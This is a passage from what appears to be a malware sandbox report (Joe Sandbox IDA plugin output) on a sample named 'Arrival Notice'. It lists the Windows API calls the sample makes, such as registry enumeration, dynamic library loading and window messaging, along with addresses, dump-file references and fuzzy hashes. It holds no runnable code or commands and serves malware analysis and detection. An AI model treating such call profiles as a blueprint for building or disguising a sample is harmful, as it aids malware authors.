                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0093AF13
                                              • __swprintf.LIBCMT ref: 0093AF2C
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0095F910), ref: 0093AF6A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ErrorMode$InformationVolume__swprintf
                                              • String ID: %lu
                                              • API String ID: 3164766367-685833217
                                              • Opcode ID: 6cce2733b04d874708e37687d6c7aa5d80e35dce664bd4585b3db028ab257f0b
                                              • Instruction ID: e9b2810ccc84b56ed67b4fb9200802c2409aeb3e357056054bb2dcad93176af3
                                              • Opcode Fuzzy Hash: 6cce2733b04d874708e37687d6c7aa5d80e35dce664bd4585b3db028ab257f0b
                                              • Instruction Fuzzy Hash: F7216230600209AFCB10EF65C885EAE7BB8FF89714F004069F945DB351DB31EA41DB61
                                              APIs
                                                • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                                • Part of subcall function 0092A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0092A399
                                                • Part of subcall function 0092A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0092A3AC
                                                • Part of subcall function 0092A37C: GetCurrentThreadId.KERNEL32 ref: 0092A3B3
                                                • Part of subcall function 0092A37C: AttachThreadInput.USER32(00000000), ref: 0092A3BA
                                              • GetFocus.USER32 ref: 0092A554
                                                • Part of subcall function 0092A3C5: GetParent.USER32(?), ref: 0092A3D3
                                              • GetClassNameW.USER32(?,?,00000100), ref: 0092A59D
                                              • EnumChildWindows.USER32(?,0092A615), ref: 0092A5C5
                                              • __swprintf.LIBCMT ref: 0092A5DF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                              • String ID: %s%d
                                              • API String ID: 1941087503-1110647743
                                              • Opcode ID: 4d14e3163f31924aa4492541247c5ff27206ca42999ae1002ce1e99c8265801a
                                              • Instruction ID: c647ea0dad858d9fb9d8bac10321d9953a060e68d5d290c85e4c2bf158f3586a
                                              • Opcode Fuzzy Hash: 4d14e3163f31924aa4492541247c5ff27206ca42999ae1002ce1e99c8265801a
                                              • Instruction Fuzzy Hash: BA11DF72204218ABDF10BF64EC85FEA377DEF88310F0440B6B908AA19ADB7459458B36
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00932048
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                              • API String ID: 3964851224-769500911
                                              • Opcode ID: 4ed4dcbf88ef53b227b11285972d510a1f8f15a128a272a86746e29ef97411a4
                                              • Instruction ID: 201d8669a9bd9e12d6e4df284ae95ea1e1a17200e83fc962b93b6f49050dffab
                                              • Opcode Fuzzy Hash: 4ed4dcbf88ef53b227b11285972d510a1f8f15a128a272a86746e29ef97411a4
                                              • Instruction Fuzzy Hash: 601179309042098FCF24EFA8D8904BEB3B5FF16300F10896AD851A7362EB36690ACF51
                                              APIs
                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0094EF1B
                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0094EF4B
                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0094F07E
                                              • CloseHandle.KERNEL32(?), ref: 0094F0FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                              • String ID:
                                              • API String ID: 2364364464-0
                                              • Opcode ID: d9aeb0b668fa41c08907052901e40be85100a824e394705be0d40a926deb8cd0
                                              • Instruction ID: 467aadc1ec105f4c55ad972a96e7999fbf47fee9379c90db78c913f08114a26b
                                              • Opcode Fuzzy Hash: d9aeb0b668fa41c08907052901e40be85100a824e394705be0d40a926deb8cd0
                                              • Instruction Fuzzy Hash: 1D813D716043119FD720EF29C856F2AB7E5FF88720F14895EF595DB392DA70AC408B52
                                              APIs
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                • Part of subcall function 009510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00950038,?,?), ref: 009510BC
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00950388
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009503C7
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0095040E
                                              • RegCloseKey.ADVAPI32(?,?), ref: 0095043A
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00950447
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                              • String ID:
                                              • API String ID: 3440857362-0
                                              • Opcode ID: 08222471ca3b9b7bf86b1c4e04b59ad19d0d6889c627d23e7ebcc684a13a8a02
                                              • Instruction ID: 09bab635fd8702d38f21ab8932a77ec96eb4e1f64d772ea21dbdf5cbe180f17d
                                              • Opcode Fuzzy Hash: 08222471ca3b9b7bf86b1c4e04b59ad19d0d6889c627d23e7ebcc684a13a8a02
                                              • Instruction Fuzzy Hash: 42514E31108204AFD704EF69D891F6EB7E8FF84315F04891EF995872A1DB31E908DB52
                                              APIs
                                                • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0094DC3B
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0094DCBE
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0094DCDA
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0094DD1B
                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0094DD35
                                                • Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00937B20,?,?,00000000), ref: 008D5B8C
                                                • Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00937B20,?,?,00000000,?,?), ref: 008D5BB0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                              • String ID:
                                              • API String ID: 327935632-0
                                              • Opcode ID: 880ff486219500fdc9ac7cda604ea12aa912d2fb864d44906db23928b4bb4c40
                                              • Instruction ID: 611be3238d34781e0345b547301e0541dacc5d54cef7a411ecedcae1a353ae3a
                                              • Opcode Fuzzy Hash: 880ff486219500fdc9ac7cda604ea12aa912d2fb864d44906db23928b4bb4c40
                                              • Instruction Fuzzy Hash: 4F512839A04605EFCB00EF68C494DADB7F4FF49321B04816AE855AB351DB30AD45CB91
                                              APIs
                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0093E88A
                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0093E8B3
                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0093E8F2
                                                • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0093E917
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0093E91F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                              • String ID:
                                              • API String ID: 1389676194-0
                                              • Opcode ID: fa26c749779e9e422c5ef200a8adaa19b72344cc9457a49c4e4610c46bfcc142
                                              • Instruction ID: 5dcbc9edcc68c3844fd12bb3ff1b5750064024c74d53806eef89cae91e3a0db9
                                              • Opcode Fuzzy Hash: fa26c749779e9e422c5ef200a8adaa19b72344cc9457a49c4e4610c46bfcc142
                                              • Instruction Fuzzy Hash: FC510935A00215EFCB01EF69C991AAEBBF5FF08310F1480A9E849AB361DB31AD51DF51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 71bfaf0f0f3b2c27485b0496cd987908e2c8857dfebeebb6128914124b5c8c96
                                              • Instruction ID: d5845f388459736b7d8fe1652fdd5377d732c942b428882e6ae93eca7f30b005
                                              • Opcode Fuzzy Hash: 71bfaf0f0f3b2c27485b0496cd987908e2c8857dfebeebb6128914124b5c8c96
                                              • Instruction Fuzzy Hash: FD410135904204AFC720DF6ACC58FA9BBA8FB09326F140365FC55A72E0D770AE49DB59
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 008D2357
                                              • ScreenToClient.USER32(009967B0,?), ref: 008D2374
                                              • GetAsyncKeyState.USER32(00000001), ref: 008D2399
                                              • GetAsyncKeyState.USER32(00000002), ref: 008D23A7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AsyncState$ClientCursorScreen
                                              • String ID:
                                              • API String ID: 4210589936-0
                                              • Opcode ID: 479d0b78e1ad051b8e2e75c613acd7681a1c4d5f626c683cdcb3f4f0884f1e98
                                              • Instruction ID: c07e74e3ee606e593a58441710734f1992d2201dddba65fb887b50e0526ce138
                                              • Opcode Fuzzy Hash: 479d0b78e1ad051b8e2e75c613acd7681a1c4d5f626c683cdcb3f4f0884f1e98
                                              • Instruction Fuzzy Hash: 10417C75508219FFDB199F69C844AEABB74FB45360F20435AF828E23A0C734A994DB91
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0092695D
                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 009269A9
                                              • TranslateMessage.USER32(?), ref: 009269D2
                                              • DispatchMessageW.USER32(?), ref: 009269DC
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009269EB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                              • String ID:
                                              • API String ID: 2108273632-0
                                              • Opcode ID: 12b012e6b968601877977ced2b985863cb0de75387f986c2f0f912a487b389fe
                                              • Instruction ID: 1acbef16926005580111ac9a2205c5fb25590bcb3d91f4555bb69ac2f4ae06ab
                                              • Opcode Fuzzy Hash: 12b012e6b968601877977ced2b985863cb0de75387f986c2f0f912a487b389fe
                                              • Instruction Fuzzy Hash: 89313931919326AFDB20CF79EC84FB67BACAB01310F14456AE421D38A4DB34D8C9E790
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00928F12
                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00928FBC
                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00928FC4
                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00928FD2
                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00928FDA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessagePostSleep$RectWindow
                                              • String ID:
                                              • API String ID: 3382505437-0
                                              • Opcode ID: beff1b03b2a0516174f3269eca9c3c8ddd02678ea1f8fbe9022df4705a6bcfc9
                                              • Instruction ID: fe005f2f5813a26915d564289b2dcbbb40ba874b726d555a3575b40e4c1f33ba
                                              • Opcode Fuzzy Hash: beff1b03b2a0516174f3269eca9c3c8ddd02678ea1f8fbe9022df4705a6bcfc9
                                              • Instruction Fuzzy Hash: C231EE71505229EFDB00CF68EA4CADF7BBAEB04326F104229F924EB1D4C7B09914DB90
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 0092B6C7
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0092B6E4
                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0092B71C
                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0092B742
                                              • _wcsstr.LIBCMT ref: 0092B74C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                              • String ID:
                                              • API String ID: 3902887630-0
                                              • Opcode ID: cfdcd2ae9038a1482e8093435125242fff436caf31a3a24df784fa678dcd9282
                                              • Instruction ID: 356487c47d4dc5b8082f5676ed65c9e28179809df8dcac9dd8a95fcfe14de290
                                              • Opcode Fuzzy Hash: cfdcd2ae9038a1482e8093435125242fff436caf31a3a24df784fa678dcd9282
                                              • Instruction Fuzzy Hash: 9121F932205258BBEB255B39AC49E7B7BECEF85721F104039FD05CA1A5EF61DC409761
                                              APIs
                                                • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                              • GetWindowLongW.USER32(?,000000F0), ref: 0095B44C
                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0095B471
                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0095B489
                                              • GetSystemMetrics.USER32(00000004), ref: 0095B4B2
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00941184,00000000), ref: 0095B4D0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$Long$MetricsSystem
                                              • String ID:
                                              • API String ID: 2294984445-0
                                              • Opcode ID: ce71c3d6ee845132f29c19637d634e3050090fff6ee36d8bbb6fbb3fb1adfe0e
                                              • Instruction ID: 930126f99ea25d8090172e8131c241c1d4feb44e9eb54652e0dee2aa0c394a67
                                              • Opcode Fuzzy Hash: ce71c3d6ee845132f29c19637d634e3050090fff6ee36d8bbb6fbb3fb1adfe0e
                                              • Instruction Fuzzy Hash: AD218031524215AFCB20DF3ACC48A6A37A8EB05732F154B29FD26C71F1E7309855DB80
                                              APIs
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00929802
                                                • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00929834
                                              • __itow.LIBCMT ref: 0092984C
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00929874
                                              • __itow.LIBCMT ref: 00929885
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$__itow$_memmove
                                              • String ID:
                                              • API String ID: 2983881199-0
                                              • Opcode ID: 2b4ffc16647450a425ef18aa4813cb4ad68360aed9d7535fd03ca8c8cb1a8911
                                              • Instruction ID: 595851084b7b89222d4ed821da1a2f6604e765eb53e7396b9b68791de569d119
                                              • Opcode Fuzzy Hash: 2b4ffc16647450a425ef18aa4813cb4ad68360aed9d7535fd03ca8c8cb1a8911
                                              • Instruction Fuzzy Hash: 2A210731B00218ABDB10AA759C86EEE3BADEF4A724F080035FD05DB245E6708D459792
                                              APIs
                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008D134D
                                              • SelectObject.GDI32(?,00000000), ref: 008D135C
                                              • BeginPath.GDI32(?), ref: 008D1373
                                              • SelectObject.GDI32(?,00000000), ref: 008D139C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              • Opcode ID: 4022d698002c35d9af9d758aebb506fee5c4994f6bd4c3713fb9da96d0d132e4
                                              • Instruction ID: 12c5776058c5ff15cc563cc58bd6a682d5ca09a2bb2472ffbec4109ebe3f4a13
                                              • Opcode Fuzzy Hash: 4022d698002c35d9af9d758aebb506fee5c4994f6bd4c3713fb9da96d0d132e4
                                              • Instruction Fuzzy Hash: 3A213A70828308EFDF159F2ADC087A97BB9FB10366F148327F814D66A0D7759991EB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: ad877e83ff1a72d83bd0bef4af1bc62ef3ff6eaf6283b4d57ab08c0f3c61d012
                                              • Instruction ID: a519a8cc4bda5a7eb563719aeafc98025492f98413cb730c30fb6a68d130ac77
                                              • Opcode Fuzzy Hash: ad877e83ff1a72d83bd0bef4af1bc62ef3ff6eaf6283b4d57ab08c0f3c61d012
                                              • Instruction Fuzzy Hash: CD0192E16085297BE604A7246C47EBF675CEF7139CB444121FE04E6287E6599E2182E1
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00934D5C
                                              • __beginthreadex.LIBCMT ref: 00934D7A
                                              • MessageBoxW.USER32(?,?,?,?), ref: 00934D8F
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00934DA5
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00934DAC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
